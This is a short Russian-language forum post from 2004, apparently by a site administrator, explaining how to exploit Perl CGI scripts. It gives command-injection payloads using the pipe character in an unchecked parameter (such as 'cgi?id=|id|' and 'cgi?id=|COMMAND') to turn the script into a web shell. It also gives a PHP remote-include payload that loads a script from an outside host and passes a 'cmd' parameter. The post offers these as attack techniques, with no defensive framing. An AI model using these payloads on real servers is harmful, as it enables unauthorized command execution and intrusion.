12.12.2004, 19:04
|
|
Администратор
Регистрация: 05.10.2003
Сообщений: 1,083
Провел на форуме:
4618051
Репутация:
45
|
|
В перловых скриптах есть некоторые фичи ... Например, пайп(Символ | ), который открывает аргумент функции не для чтения, а для испонения, что дает возможность использовать этот скрипт, как web-шелл ...
чтоб проверить выполняемость команд (толком в ДЕЙСТВИИ видел тока |id| поэтому юзаю в начале тока её)
мне надо зделать:
cgi?id=|id|
или
cgi?|id|=103 ?
Если в этой переменной id не проверяются входные параметры, то по идее синтаксис команд должен быть таков:
Код:
cgi?id=|ТУТ_ИДЕТ_КОМАНДА
Как сказал алгол, в этом случае возможна php-инъекция:
Использовать это можно использовать так:
Код:
php?t=http://xssteam.narod.ru/conf.php&cmd=КОМАНДА
Но прокатит это только в том случае, если возможен удаленный инклуд ... |
|
|